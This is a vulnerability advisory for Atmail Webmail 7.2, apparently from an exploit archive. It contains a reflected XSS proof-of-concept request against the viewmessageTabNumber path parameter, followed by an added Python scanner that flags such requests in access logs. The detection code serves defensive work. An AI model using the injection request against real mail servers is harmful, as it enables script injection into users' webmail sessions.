34585_ATMAIL WEBMAIL 7.2 - Multiple Vulnerabilities – PHP WebApps exploit.txt

Details

#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
#Date: 01.27.2014
#Vendor: atmail.com
#Version: =>7.2 (Latest ATM), tested also on 7.1.1
#Authors: Smash_ & Brag / smash[at]devilteam.pl
#PoC: poczta.pl / demo.atmail.com 
1. Cross Site Scripting 
 a) GET - viewmessageTabNumber 
Request:
host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3">

XSS
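
Added example, not part of the original advisory or of Atmail's code: a log check that flags requests whose viewmessageTabNumber path value is not a plain number. It assumes a common/combined-format access log and that a legitimate value is a short run of digits, as in the ".../viewmessageTabNumber/3" request above; the log lines are constructed.

```python
import re
from urllib.parse import unquote

PARAM = "viewmessageTabNumber"
# Assumption: a legitimate tab number is a short run of ASCII digits, like the "3" in the advisory.
VALID_VALUE = re.compile(r"[0-9]{1,4}")
# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def tab_number_value(target):
    """Return the decoded viewmessageTabNumber path value, or None if absent."""
    path = target.split("?", 1)[0]
    # Split on "/" before decoding so an encoded slash cannot hide part of the value,
    # then decode twice to also catch double-encoded input such as %2522.
    segments = [unquote(unquote(s)) for s in path.split("/")]
    # Path parameters arrive as .../name/value pairs.
    for name, value in zip(segments, segments[1:]):
        if name == PARAM:
            return value
    return None

def is_suspicious(target):
    """True when the parameter is present and its value is not digits only."""
    value = tab_number_value(target)
    return value is not None and VALID_VALUE.fullmatch(value) is None

def scan(log_lines):
    """Return (line_number, decoded_value) for each request with a non-numeric tab number."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append((number, tab_number_value(match.group(1))))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Jan/2014:10:00:01 +0000] "GET /mail/index.php/mail/composemessage/index/viewmessageTabNumber/3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Jan/2014:10:00:07 +0000] "GET /mail/index.php/mail/composemessage/index/viewmessageTabNumber/3%22%3E HTTP/1.1" 200 5188',
    '203.0.113.9 - - [27/Jan/2014:10:00:09 +0000] "GET /mail/index.php/mail/composemessage/index/viewmessageTabNumber/3%2522%253E HTTP/1.1" 200 5188',
    '203.0.113.7 - - [27/Jan/2014:10:00:12 +0000] "GET /mail/index.php/mail/inbox HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected {PARAM} value {value!r}")
```

A hit only shows that a request carried a non-numeric value; whether the response reflected it unencoded still has to be checked against the installed version.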